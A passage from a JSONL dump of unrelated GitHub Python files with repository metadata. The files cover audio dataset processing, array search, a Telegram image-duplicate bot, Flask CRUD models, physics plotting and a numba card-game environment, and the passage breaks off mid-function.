= to_txt[0]\n texts = to_txt[1]\n with open(filename2 + name + '.csv', 'w+') as txt:\n txt.write(name + '|' + texts)\n # audio_files_to_directories\n # AUDIO\n if not os.path.isdir(filename4 + name):\n os.mkdir(filename4 + name)\n os.replace(filename3 + name + '.flac', filename4 + name + '/' + name + '.flac')\n# переименоание аудио файла из flac в wav\nlist_dir =os.listdir(path=\"audio_clips\")\n\nfor i in range(0,2703):\n if os.path.exists('audio_clips/' + list_dir[i] + '/' + list_dir[i] + '.flac'):\n os.rename('audio_clips/' + list_dir[i] + '/' + list_dir[i] + '.flac', 'audio_clips/' + list_dir[i] + '/' + list_dir[i] + '.wav')\n\n\n","repo_name":"xiill/processing_dataset","sub_path":"DataSet3_LibriSpeech/from_txt_to_csv.py","file_name":"from_txt_to_csv.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25978966998","text":"import random\nfrom game.move_actors_action import MoveActorsAction\nfrom game import constants\nfrom game.action import Action\nfrom game.audio_service import AudioService\nfrom game.point import Point\n\nclass HandleEdgeBounce(Action):\n \"\"\"A code template for handling collisions. The responsibility of this class of objects is to update the game state when actors collide.\n \n Stereotype:\n Controller\n \"\"\"\n def __init__(self, physics_service):\n super().__init__()\n self._physics_service = physics_service\n self._move_actors_action = MoveActorsAction()\n\n def execute(self, cast):\n \"\"\"Executes the action using the given actors.\n\n Args:\n cast (dict): The game actors {key: tag, value: list}.\n \"\"\"\n audio_service = AudioService()\n\n text_background = cast[\"text_background\"][0]\n\n position = text_background.get_position()\n x = position.get_x()\n\n if x < 0:\n dx = 0\n dy = 0\n \n velocity = Point(dx, dy)\n\n text_background.set_velocity(velocity)","repo_name":"Lizzie-hun/cse210-project","sub_path":"typingGame/game/handle_edge_bounce.py","file_name":"handle_edge_bounce.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43867983550","text":"def pivotedSearch(arr, key):\n n = len(arr)-1\n\n pvt = findPivot(arr, 0, n)\n\n if pvt == -1:\n return binarySearch(arr, 0, n, key)\n\n if arr[pvt] == key:\n return pvt\n if arr[0] <= key:\n return binarySearch(arr, 0, pvt-1, key)\n return binarySearch(arr, pvt+1, n, key)\n\n\n\ndef findPivot(arr, low, high):\n\n if high < low:\n return -1\n\n if high == low:\n return low\n \n mid = (low+high)//2\n\n if mid > low and arr[mid] < arr[mid-1]:\n return mid - 1\n if mid < high and arr[mid] > arr[mid+1]:\n return mid\n if arr[low]>arr[mid]:\n return findPivot(arr, 0, mid-1)\n return findPivot(arr, mid+1, high)\n \n\ndef binarySearch(arr, low, high, key):\n\n if high < low:\n return -1\n \n while low <= high:\n mid = (low+high)//2\n if arr[mid] == key:\n return mid\n elif arr[mid] > key:\n high = mid - 1\n else:\n low = mid + 1\n\ndef search(arr, low, high, key):\n if low > high:\n return -1\n \n mid = (low+high)//2\n\n if arr[mid] == key:\n return mid\n \n if arr[low] <= arr[mid]:\n\n if key >= arr[low] and key <= arr[mid]:\n return search(arr, low, mid-1, key)\n return search(arr, mid+1, high, key)\n \n if key >= arr[mid] and key <= arr[high]:\n return search(arr, mid+1, high, key)\n return search(arr, low, mid-1, key)\n\n#direct search withput any pivot\ndef searchw(arr, target):\n l,r = 0, len(arr)-1\n\n while l<=r:\n mid = (l+r)//2\n\n if arr[mid] == target:\n return mid\n \n if arr[l] <= arr[mid]:\n if key >= arr[l] and key <= arr[mid]:\n r = mid -1\n else:\n l = mid+1\n else:\n if key >= arr[mid] and key<= arr[r]:\n l = mid + 1\n else:\n r = mid -1 \n\n\n\nif __name__ == \"__main__\":\n arr = [5,6,7,8,9,10,0,1,2,3,4]\n\n key = 3\n\n idx = pivotedSearch(arr, key)\n print(idx)\n\n id2 = search(arr, 0, len(arr)-1, key)\n print(id2)\n\n id2 = searchw(arr, key)\n print(id2)","repo_name":"abhij215/DSA","sub_path":"03_Searching/rotated&sorted.py","file_name":"rotated&sorted.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38413228445","text":"def getZeroes(a, b, c):\r\n from math import sqrt\r\n\r\n try:\r\n alpha = str((-b + Decimal(str(sqrt(pow(b, 2) - 4*a*c)))) / (2*a))\r\n beta = str((-b - Decimal(str(sqrt(pow(b, 2) - 4*a*c)))) / (2*a))\r\n except ValueError:\r\n alpha = 'i'\r\n beta = 'i'\r\n\r\n return alpha, beta\r\n\r\nfrom decimal import Decimal\r\nprint()\r\nprint(\"Enter the values of a, b and c, \\nassuming your equation is of the form ax^2 + bx + c \\nwhere the variable is x and a, b and c are constants.\\n\")\r\n\r\nx2coeff = Decimal(input(\"a : \"))\r\nx1coeff = Decimal(input(\"b : \"))\r\nx0coeff = Decimal(input(\"c : \"))\r\n\r\nprint(\"\\nZeroes :\", getZeroes(x2coeff, x1coeff, x0coeff))\r\n\r\ninput('\\n{Hit enter to exit}... ')\r\n","repo_name":"wolfrust/UtzX","sub_path":"Math/findZeroesOfQuadraticEquation.py","file_name":"findZeroesOfQuadraticEquation.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72283749951","text":"# Simple script to calculate halo/subhalo mass functions from hdf5 \n# \n# Below run gives mass functions of the Micro-Uchuu simulation at z=0 \n# python uchuu_h5_mfunc.py MicroUchuu_halolist_z0p00.h5 mfunc.pdf \n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport sys\n\nargs = sys.argv\ninputfile = args[1]\noutputfile = args[2]\n\nhf = h5py.File( inputfile, 'r')\nmvir = np.array( hf['Mvir'])\npid = np.array(hf['pid'])\nhf.close()\n\nmvir_halo = mvir[pid==-1]\nmvir_subhalo = mvir[pid!=-1]\n\nbins0 = np.logspace( 8, 16, 33)\nn_halo, bins = np.histogram( mvir_halo, bins=(bins0))\nn_subhalo, bins = np.histogram( mvir_subhalo, bins=(bins0))\n\nmbins = np.zeros_like(n_halo)\nfor i in range( len(bins)-1):\n mbins[i] = np.sqrt( bins[i] * bins[i+1])\n\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.plot( mbins, n_halo, \"o-\", label=\"halo\")\nplt.plot( mbins, n_subhalo, \"s-\", label=\"subhalo\")\nplt.legend()\nplt.savefig( outputfile)\n","repo_name":"uchuuproject/uchuu_analysis","sub_path":"uchuu_h5_mfunc.py","file_name":"uchuu_h5_mfunc.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"5645351144","text":"import asyncio\nimport logging\nimport random\n\nfrom aiogram import types\n\nfrom bot.misc import dp, redis\nfrom bot.utils import get_photo_from_message\nfrom config.settings import settings\nfrom schemas import Image\nfrom utils.serializers import ImageRedisSerializer\nfrom bot.misc import bot\n\nlogger = logging.getLogger(__name__)\n\n\nasync def _duplicate_warn(chat_id: int, sender_id: int, sender_message_id: int, original_message_id: int):\n async def _bro():\n await bot.send_message(\n chat_id=chat_id,\n text=f'Hey, {sender_id}, bro, seems you duplicated this one',\n reply_to_message_id=original_message_id,\n )\n\n async def _stickerochek():\n await bot.send_sticker(\n chat_id=chat_id,\n sticker=random.choice([\n 'CAACAgIAAx0CYy9UggADMGGkOdn5_lKMm0v2lBEG8XbLTwJHAAIzAAPYahYQBqWljQKJdpAiBA',\n 'CAACAgIAAx0CYy9UggADM2GkOm85app0Wx1Xqypok7l_IH6kAAI0AAPYahYQKdZ6LYBoGIkiBA',\n 'CAACAgIAAx0CYy9UggADNGGkOn-wZfdx4gNuG3uTLVZyraX_AAI6AAPYahYQflbGPWwW2VoiBA',\n 'CAACAgIAAx0CYy9UggADNWGkOpiMSXPwNYNjtPOKZMu1nKJVAAI7AAPYahYQhe2Te5NF-mEiBA',\n 'CAACAgIAAx0CYy9UggADNmGkOq7pTv4TnoX2A771WwUnAAEWsQACHwAD2GoWEDAFXgn-vPZ4IgQ',\n 'CAACAgIAAx0CYy9UggADN2GkOvSGoYiGxxZ_L_z25mhmQa1jAAIeAAPYahYQueCh9mNLrzEiBA',\n 'CAACAgIAAx0CYy9UggADPWGkPaH7jqm0cFhM6KRhSf61pttsAAINAwACEzmPEWPVqCB_X-3SIgQ', # boi\n 'CAACAgQAAx0CYy9UggADPmGkPcCpun-P3W_iMhWeqwfaX45MAAITMgACw4FiCcvUltlN1aeaIgQ', # angry cat\n 'CAACAgQAAx0CYy9UggADP2GkPeuyBpKjMvnEHl7wteqDRjvDAAJnMgACw4FiCVXDFX7LffiiIgQ', # sniff\n ]),\n reply_to_message_id=sender_message_id,\n )\n await bot.send_message(\n chat_id=chat_id,\n text='.',\n reply_to_message_id=original_message_id,\n )\n\n await random.choices([_bro, _stickerochek], [0.15, 0.85])[0]()\n\n\n@dp.message_handler(\n content_types=['photo'],\n chat_id=settings.TG_BOT_ESTHETIQUE_CHAT,\n is_esthetique_format=True,\n)\nasync def handle_esthetique_photo(message: types.Message):\n logging.info(message.photo)\n\n image_file = await get_photo_from_message(message)\n image = Image(message_id=message.message_id, file=image_file)\n image_serialier = ImageRedisSerializer(image=image, redis=redis)\n\n async with asyncio.Lock():\n duplicated_message_id = await image_serialier.get_duplicate()\n if not duplicated_message_id:\n logger.info(f'New esthetique came from {message.from_user}, remember photo hash...')\n return await image_serialier.save()\n\n logger.info(\n f'{message.from_user} sent duplicate with {message.message_id} '\n f'of {duplicated_message_id}. Warn him...'\n )\n await _duplicate_warn(\n message.chat.id,\n message.from_user.mention,\n message.message_id,\n duplicated_message_id,\n )\n","repo_name":"AlcibiadesCleinias/esthetique-telegram-bot","sub_path":"bot/src/bot/handlers/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"72531777152","text":"import sys\nimport re\nimport os\nimport numpy as np\nfrom core import block, transforms, parse\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom tensorflow.python.keras.models import load_model\n\nfrom scipy.signal import savgol_filter, butter\n\nfrom scipy.optimize import curve_fit\n\n\nmatplotlib.rcParams.update({'font.size': 12})\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\ndef backstrapolate(r, phi):\n assert len(r.shape) == len(phi.shape), \"dimensions are not correct\"\n\n cav = r.shape[0] - phi.shape[0]\n\n phi_ex = np.zeros_like(r)\n\n def polynom(r, a, b, c):\n return a * np.exp(b*r) + c\n\n popt, pcov = curve_fit(polynom, r[cav:cav+20], phi[:20])\n\n phi_ex[cav:] = phi\n phi_ex[:cav] = polynom(r[:cav], *popt)\n\n return r, phi_ex\n\n\ndef plot_funcs(r, avg_tcf, err_tcf, avg_dcf, err_dcf, avg_grad_icf, err_grad_icf, fd_gr,):\n \"\"\"\n plot some stuff\n \"\"\"\n mask_var = fd_gr.shape[0]- np.sum(np.isfinite(fd_gr))\n mask_avg = np.argmax(avg_tcf + 1.> 1e-8)\n\n print(mask_avg, mask_var, r[mask_var])\n mask = np.max((mask_avg, mask_var))\n\n X_down = np.vstack((avg_tcf[mask:], avg_dcf[mask:], fd_gr[mask:], avg_grad_icf[mask:])).T\n\n # Get IBI potential\n phi_ibi = -np.log(avg_tcf[mask:] + 1.)\n\n # Get HNC potential\n phi_hnc = avg_tcf[mask:] - avg_dcf[mask:] + phi_ibi\n\n ## Get Non-Local Closure Potential\n non_local = load_model('learn/models/non-local-400.h5', compile=False)\n br_nla = non_local.predict(X_down[:,0:4]).ravel()\n phi_nla = phi_hnc + br_nla\n\n br_nla_s = savgol_filter(br_nla, window_length=21, polyorder=2, deriv=0, delta=r[1]-r[0])\n phi_nla_s = phi_hnc + br_nla_s\n\n r, phi_ibi = backstrapolate(r, phi_ibi)\n r, phi_hnc = backstrapolate(r, phi_hnc)\n r, phi_nla_s = backstrapolate(r, phi_nla_s)\n r, phi_nla = backstrapolate(r, phi_nla)\n\n f_ibi = -np.gradient(phi_ibi, r[1]-r[0])\n f_hnc = -np.gradient(phi_hnc, r[1]-r[0])\n f_nla = -np.gradient(phi_nla, r[1]-r[0])\n # f_nla_s = -np.gradient(phi_nla_s, r[1]-r[0])\n\n # f_ibi = -savgol_filter(phi_ibi, window_length=31, polyorder=2, deriv=1, delta=r[1]-r[0])\n # f_hnc = -savgol_filter(phi_hnc, window_length=31, polyorder=2, deriv=1, delta=r[1]-r[0])\n f_nla_s = -savgol_filter(phi_nla_s, window_length=7, polyorder=2, deriv=1, delta=r[1]-r[0])\n\n #Save the potentials\n output_path = \"data/test/down/\"\n r_cut_ind = np.argmin(r<3)\n\n # save phi\n mix_type = \"lj-mix\"\n file_ibi = os.path.join(output_path,'phi_ibi_{}.dat'.format(mix_type))\n file_hnc = os.path.join(output_path,'phi_hnc_{}.dat'.format(mix_type))\n file_nla = os.path.join(output_path,'phi_nla_{}.dat'.format(mix_type))\n file_nla_n = os.path.join(output_path,'phi_nla_n_{}.dat'.format(mix_type))\n\n out_ibi = np.vstack((r[:r_cut_ind], phi_ibi[:r_cut_ind], f_ibi[:r_cut_ind]))\n np.savetxt(file_ibi, out_ibi)\n\n out_hnc = np.vstack((r[:r_cut_ind], phi_hnc[:r_cut_ind], f_hnc[:r_cut_ind]))\n np.savetxt(file_hnc, out_hnc)\n\n out_nla = np.vstack((r[:r_cut_ind], phi_nla_s[:r_cut_ind], f_nla_s[:r_cut_ind]))\n np.savetxt(file_nla, out_nla)\n\n out_nla_n = np.vstack((r[:r_cut_ind], phi_nla[:r_cut_ind], f_nla[:r_cut_ind]))\n np.savetxt(file_nla_n, out_nla_n)\n\n # plot\n\n fig, axes = plt.subplots(2, 3, figsize=(18, 8))\n\n # Plot g(r)\n\n axes[0, 0].plot(r, avg_tcf + 1)\n axes[0, 0].fill_between(r, avg_tcf + err_tcf + 1, avg_tcf - err_tcf + 1, alpha=0.3)\n\n axes[0, 0].plot((r[0],r[-1]), np.ones(2), '--', color=\"tab:blue\")\n axes[0, 0].set_xlabel('r/$\\sigma$')\n axes[0, 0].set_ylabel('$g(r)$')\n\n # Plot c(r)\n\n axes[0, 1].plot(r, avg_dcf, label='$c_{sw}(r)$')\n axes[0, 1].fill_between(r, avg_dcf + err_dcf, avg_dcf - err_dcf, alpha=0.2)\n\n axes[0, 1].plot((r[0],r[-1]), np.zeros(2), '--', color=\"tab:blue\")\n axes[0, 1].set_xlabel('r/$\\sigma$')\n axes[0, 1].set_ylabel('$c(r)$')\n axes[0, 1].legend()\n\n # plot y'(r)\n\n axes[1, 1].plot(r, avg_grad_icf)\n axes[1, 1].fill_between(r, avg_grad_icf + err_grad_icf, avg_grad_icf - err_grad_icf, alpha=0.2)\n axes[1, 1].set_xlabel('r/$\\sigma$')\n axes[1, 1].set_ylabel('$\\gamma\\'(r)$')\n\n # plot b(r)\n\n axes[0, 2].plot(r, np.zeros_like(r), label=\"HNC\")\n axes[0, 2].plot(r[mask:], br_nla, label=\"NLA\")\n axes[0, 2].plot(r[mask:], br_nla_s, label=\"NLA-SG\")\n axes[0, 2].set_xlabel('r/$\\sigma$')\n axes[0, 2].set_ylabel('$b(r)$')\n axes[0, 2].legend()\n\n # Phi(r)\n\n axes[1, 2].plot(r,phi_ibi, label=\"IBI\")\n axes[1, 2].plot(r,phi_hnc, label=\"HNC\")\n axes[1, 2].plot(r,phi_nla, label=\"NLA\", alpha=0.3)\n axes[1, 2].plot(r,phi_nla_s, label=\"NLA-SG\")\n axes[1, 2].set_xlim((0,3))\n axes[1, 2].set_ylim((-2,6))\n axes[1, 2].set_xlabel('r/$\\sigma$')\n axes[1, 2].set_ylabel('$\\phi(r)$')\n axes[1, 2].legend()\n\n ## f(r)\n\n axes[1, 0].plot(r,f_ibi, label=\"IBI\")\n axes[1, 0].plot(r,f_hnc, label=\"HNC\")\n axes[1, 0].plot(r,f_nla, label=\"NLA\", alpha=0.3)\n axes[1, 0].plot(r,f_nla_s, label=\"NLA-SG\")\n # axes[1, 0].plot(r,f_nla_sg, '--', label=\"NLA-SG\")\n axes[1, 0].set_xlim((0,3))\n axes[1, 0].set_ylim((-20,50))\n axes[1, 0].set_xlabel('r/$\\sigma$')\n axes[1, 0].set_ylabel('$f(r)$')\n axes[1, 0].legend()\n\n fig.tight_layout()\n\n plt.show()\n\n\n return\n \n\n\n\nif __name__ == \"__main__\":\n\n input_size = 20.\n input_density = 0.8\n input_temp = 1.0\n\n rdf_path = sys.argv[1]\n sq_path = sys.argv[2]\n \n real = transforms.process_inputs(input_size, input_temp, input_density, \n \"invert\", rdf_path=rdf_path, sq_path=sq_path)\n\n plot_funcs(*real)\n\n plt.show()\n\n","repo_name":"CompRhys/ornstein-zernike","sub_path":"process/multi-potential.py","file_name":"multi-potential.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"7744993056","text":"import sys\nfrom pytex.src import PytexTools\n\nmyRequest = PytexTools.Request(\"seconde\")\nmyRequest.original_filename=\"smath.tex\"\n\ndef set_corrPosition_and_Draft(A):\n u=\"\\corrPosition{1}\"\n v=\"\\corrPosition{2}\"\n A = A.replace(u, v)\n u=\"\\corrPosition{2}\"\n A = A.replace(u, v)\n u=\"\\corrDraft\"\n A=A.replace(u,\"%\")\n return A\n\ndef accept_all_input(medicament):\n medicament.accept_input=lambda x: True\n\nmyRequest.add_plugin(accept_all_input,\"options\")\nmyRequest.add_plugin(set_corrPosition_and_Draft,\"after_pytex\")\nmyRequest.new_output_filename=\"0-smath.pdf\"\n","repo_name":"LaurentClaessens/smath","sub_path":"lst_smath.py","file_name":"lst_smath.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"2520830137","text":"# Problem Id: 122\n# Problem Name: Best Time to Buy and Sell Stock II, 买卖股票的最佳时机 II\n# Problem Url: https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-ii/\n# Problem Level: Medium\n# Language: Python3\n \nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n result = 0\n for i in range(1,len(prices)):\n if prices[i] - prices[i-1] > 0:\n result = result + prices[i] - prices[i-1]\n return result\n","repo_name":"siru-xiong/leetcode-solutions","sub_path":"solutions/0122-买卖股票的最佳时机II.py","file_name":"0122-买卖股票的最佳时机II.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8175971411","text":"# import the function that will return an instance of a connection\nfrom flask_app.config.mysqlconnection import connectToMySQL\n# model the class after the friend table from our database\n\nDATABASE = 'Users_schema'\n\nclass User:\n def __init__( self , data ):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.email = data['email']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n # Now we use class methods to query our database\n \n #**********************************READ\n \n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM users;\"\n results = connectToMySQL(DATABASE).query_db(query)\n users = []\n for user in results:\n users.append(cls(user))\n return users\n\n @classmethod\n def get_one(cls, id):\n query = \"SELECT * FROM users WHERE id = %(id)s;\"\n results = connectToMySQL(DATABASE).query_db(query, id)\n if results:\n user = cls(results[0])\n return user\n\n\n#****************************************CREATE\n @classmethod\n def save(cls, data ):\n query = \"INSERT INTO users ( first_name , last_name , email) VALUES ( %(first_name)s , %(last_name)s , %(email)s);\"\n # data is a dictionary that will be passed into the save method from server.py\n return connectToMySQL(DATABASE).query_db( query, data)\n\n#********************************************UPDATE\n\n @classmethod\n def update_one(cls, data:dict) -> None:\n query = \"UPDATE users SET first_name = %(first_name)s, last_name = %(last_name)s, email = %(email)s WHERE id = %(id)s;\"\n return connectToMySQL(DATABASE).query_db(query, data)\n\n#********************************************DELETE\n\n @classmethod\n def delete_one(cls, data: dict) -> None:\n query = 'DELETE from users WHERE id = %(id)s;' \n return connectToMySQL(DATABASE).query_db(query, data)","repo_name":"s3mi0tics/users_crud_modularized","sub_path":"flask_app/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10836854934","text":"from typing import Union\n\nfrom pyodoo import CompareType\n\n\nclass Filter(object):\n \"\"\"\n A filter object used by Odoo\n \"\"\"\n def __init__(self,\n field: str,\n compare_type: CompareType,\n value: object):\n self.field = field\n self.compare_type = compare_type\n self.value = value\n\n def explode(self) -> list[Union[str, object]]:\n \"\"\"\n Extract the list from the filter, in the format used in Odoo filters\n\n :return: list with three values (field name, compare type and value)\n \"\"\"\n return [self.field,\n self.compare_type,\n self.value]\n","repo_name":"muflone/pyodoo","sub_path":"pyodoo/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"24659347216","text":"import numpy as np\nfrom numba import njit, jit\nfrom numba.typed import List\n\nperData = np.array([0])\nCARD = 52\ncards = np.arange(1, 53) # Build cards\nsevens = np.array([6, 19, 32, 45])\nidxChip = np.array([21, 35, 49, 63])\nACTION_SIZE = 53\nAGENT_SIZE = 4\nSTATE_SIZE = 112\n\n\n# Work function\n@njit()\ndef initEnv():\n cards = np.arange(0, 52, dtype=np.int64)\n np.random.shuffle(cards)\n env = np.full(71, 0)\n env[0:8] = np.array([-1, 6, -1, 19, -1, 32, -1, 45])\n\n env[8:21] = cards[0:13]\n env[22:35] = cards[13:26]\n env[36:49] = cards[26:39]\n env[50:63] = cards[39:52]\n idx = np.array([21, 35, 49, 63])\n env[idx] = 50\n env[64] = 0\n env[65] = 0\n env[66] = 0\n return env\n\n\n@njit()\ndef getAgentSize():\n return AGENT_SIZE\n\n\n@njit()\ndef getActionSize():\n return ACTION_SIZE\n\n\n@njit()\ndef getStateSize():\n return STATE_SIZE\n\n\n@njit()\ndef getAgentState(env):\n state = np.zeros(112)\n pIdx = env[64]\n player_card_idx = env[8 + pIdx * 14 : 8 + pIdx * 14 + 13]\n state[player_card_idx] = 1\n card_on_board = env[0:8]\n card_on_board = card_on_board[card_on_board > -1]\n card_on_board_id = np.full(52, 0)\n card_on_board_id[card_on_board] = 1\n state[52:104] = card_on_board_id\n state[104] = env[8 + pIdx * 14 + 13]\n cards_len = list([0, 0, 0])\n count = 0\n for i in range(getAgentSize()):\n if i == pIdx:\n continue\n cards = env[8 + i * 14 : 8 + i * 14 + 13]\n len_ = len(np.where(cards > -1)[0])\n cards_len[count] = len_\n count += 1\n state[105:108] = cards_len\n state[108] = env[66] # Game da ket thuc hay chua\n chipArr = np.zeros(3)\n count = 0\n for i in range(4):\n if i == pIdx:\n continue\n chip = env[8 + i * 14 + 13]\n chipArr[count] = chip\n count += 1\n state[109:112] = chipArr\n return state\n\n\n@njit()\ndef getValidActions(state):\n p_cards_binary = state[0:52]\n p_cards = np.where(p_cards_binary == 1)[0]\n card_on_board_binary = state[52:104]\n card_on_board = np.where(card_on_board_binary == 1)[0]\n arr_action = np.zeros(53)\n arr_action[52] = 1\n for i in range(len(arr_action)):\n if i in p_cards and i in card_on_board:\n arr_action[i] = 1\n return arr_action\n\n\n# ------------------------------------------------------------------------\n@njit()\ndef stepEnv(action, env):\n player_Id = env[64]\n player_Card = env[8 + player_Id * 14 : 8 + player_Id * 14 + 13]\n current_card_on_board = env[0:8]\n if action == 52:\n env[8 + player_Id * 14 + 13] -= 1\n env[65] += 1\n if env[8 + player_Id * 14 + 13] <= 0:\n return -2\n if action != 52:\n player_Card[np.where(player_Card == action)[0]] = -1\n if action == 6 or action == 19 or action == 32 or action == 45: # action bang 7\n if action == 6:\n current_card_on_board[0:2] = [5, 7]\n if action == 19:\n current_card_on_board[2:4] = [18, 20]\n if action == 32:\n current_card_on_board[4:6] = [31, 33]\n if action == 45:\n current_card_on_board[6:8] = [44, 46]\n else: # Check các action hợp lệ\n if 0 <= action < 6:\n current_card_on_board[0] -= 1\n if 6 < action < 12:\n current_card_on_board[1] += 1\n if 12 < action < 19:\n current_card_on_board[2] -= 1\n if 19 < action < 25:\n current_card_on_board[3] += 1\n if 25 < action < 32:\n current_card_on_board[4] -= 1\n if 32 < action < 38:\n current_card_on_board[5] += 1\n if 38 < action < 45:\n current_card_on_board[6] -= 1\n if 45 < action < 52:\n current_card_on_board[7] += 1\n env[0:8] = current_card_on_board\n env[8 + player_Id * 14 : 8 + player_Id * 14 + 13] = player_Card\n if max(env[8 + player_Id * 14 : 8 + player_Id * 14 + 13]) == -1:\n return -1\n return 0\n\n\n# ----------------------------------------------------------------\n@njit()\ndef getReward(state):\n IsEnd = state[108]\n if IsEnd == 0:\n return -1\n if IsEnd == 1:\n p_chip = state[104]\n chip_arr = state[109:112]\n if p_chip > max(chip_arr):\n return 1\n elif p_chip == max(chip_arr):\n id_max_chip = np.argmax(chip_arr)\n cards_len = state[105:108]\n player_cards = state[0:52]\n player_cards_id = np.where(player_cards > -1)\n player_cards_len = len(player_cards_id)\n if player_cards_len >= cards_len[id_max_chip]:\n return 1\n else:\n return 0\n else:\n return 0\n\n\n# ----------------------------------------------------------------\n@njit()\ndef one_game_numba(\n p0,\n list_other,\n per_player,\n per1,\n per2,\n per3,\n p1,\n p2,\n p3,\n):\n allGame = True\n saveStoreChip = np.array([50, 50, 50, 50])\n idxPlayerChip = np.array([21, 35, 49, 63])\n while allGame:\n env = initEnv()\n env[idxPlayerChip] = saveStoreChip\n oneGame = True\n while oneGame:\n count = 10000\n if count > 0:\n count -= 1\n for i in range(getAgentSize()):\n env[64] = i\n state = getAgentState(env)\n if list_other[i] == -1:\n action, per_player = p0(state, per_player)\n if list_other[i] == 1:\n action, per1 = p1(state, per1)\n if list_other[i] == 2:\n action, per2 = p2(state, per2)\n if list_other[i] == 3:\n action, per3 = p3(state, per3)\n stepEnvReturn = stepEnv(action, env)\n if stepEnvReturn == -1:\n oneGame = False\n env[8 + i * 14 + 13] += env[65]\n saveStoreChip = env[idxPlayerChip]\n env[65] = 0\n elif stepEnvReturn == -2: # Khi nguoi choi het chip\n env[66] = 1\n # Cong chip cho nguoi choi con it bai nhat\n player_chip = env[idxPlayerChip]\n player_id_not_0_chip = np.where(player_chip > 0)[0]\n arr_player_cards = np.zeros(13 * 3)\n for i in range(len(player_id_not_0_chip)):\n player_cards = env[\n 8\n + player_id_not_0_chip[i] * 13 : 8\n + player_id_not_0_chip[i] * 13\n + 13\n ] # bai cua nhung nguoi khong bi 0 chip\n arr_player_cards[\n i * 13 : i * 13 + 13\n ] = player_cards.astype(np.float64)\n arr_player_cards = np.reshape(arr_player_cards, (3, 13))\n player_card_len = np.array(\n [\n len(np.where(player_cards > -1))\n for player_cards in arr_player_cards\n ]\n )\n player_lowest_card = np.argmax(player_card_len)\n player_lowest_card_id = player_id_not_0_chip[player_lowest_card]\n env[idxPlayerChip[player_lowest_card_id]] += env[65]\n env[65] = 0\n\n for pIdx in range(4):\n env[64] = pIdx\n state = getAgentState(env)\n if list_other[pIdx] == -1:\n action, per_player = p0(getAgentState(env), per_player)\n if getReward(state) == 1:\n winner = True\n else:\n winner = False\n elif list_other[pIdx] == 1:\n action, per1 = p1(getAgentState(env), per1)\n elif list_other[pIdx] == 2:\n action, per2 = p2(getAgentState(env), per2)\n elif list_other[pIdx] == 3:\n action, per3 = p3(getAgentState(env), per3)\n allGame = False\n return winner, per_player\n if count < 0:\n return False, per_player\n\n\n# # ------------------------------------------------------------------------\ndef one_game_normal(p0, list_other, per_player, per1, per2, per3, p1, p2, p3):\n allGame = True\n saveStoreChip = np.array([50, 50, 50, 50])\n idxPlayerChip = np.array([21, 35, 49, 63])\n while allGame:\n env = initEnv()\n env[idxPlayerChip] = saveStoreChip\n oneGame = True\n while oneGame:\n count = 10000\n if count > 0:\n count -= 1\n for i in range(getAgentSize()):\n env[64] = i\n state = getAgentState(env)\n if list_other[i] == -1:\n action, per_player = p0(state, per_player)\n if list_other[i] == 1:\n action, per1 = p1(state, per1)\n if list_other[i] == 2:\n action, per2 = p2(state, per2)\n if list_other[i] == 3:\n action, per3 = p3(state, per3)\n stepEnvReturn = stepEnv(action, env)\n if stepEnvReturn == -1:\n oneGame = False\n env[8 + i * 14 + 13] += env[65]\n saveStoreChip = env[idxPlayerChip]\n env[65] = 0\n elif stepEnvReturn == -2:\n env[66] = 1\n # Cong chip cho nguoi choi con it bai nhat\n\n player_chip = env[idxPlayerChip]\n player_id_not_0_chip = np.where(player_chip > 0)[0]\n arr_player_cards = np.zeros(13 * 3)\n for i in range(len(player_id_not_0_chip)):\n player_cards = env[\n 8\n + player_id_not_0_chip[i] * 13 : 8\n + player_id_not_0_chip[i] * 13\n + 13\n ] # bai cua nhung nguoi khong bi 0 chip\n arr_player_cards[\n i * 13 : i * 13 + 13\n ] = player_cards.astype(np.float64)\n arr_player_cards = np.reshape(arr_player_cards, (13, 3))\n player_card_len = np.array(\n [\n len(np.where(player_cards > -1))\n for player_cards in arr_player_cards\n ]\n )\n player_lowest_card = np.argmax(player_card_len)\n player_lowest_card_id = player_id_not_0_chip[player_lowest_card]\n env[idxPlayerChip[player_lowest_card_id]] += env[65]\n env[65] = 0\n for pIdx in range(4):\n env[64] = pIdx\n state = getAgentState(env)\n if list_other[pIdx] == -1:\n action, per_player = p0(getAgentState(env), per_player)\n if getReward(state) == 1:\n winner = True\n else:\n winner = False\n elif list_other[pIdx] == 1:\n action, per1 = 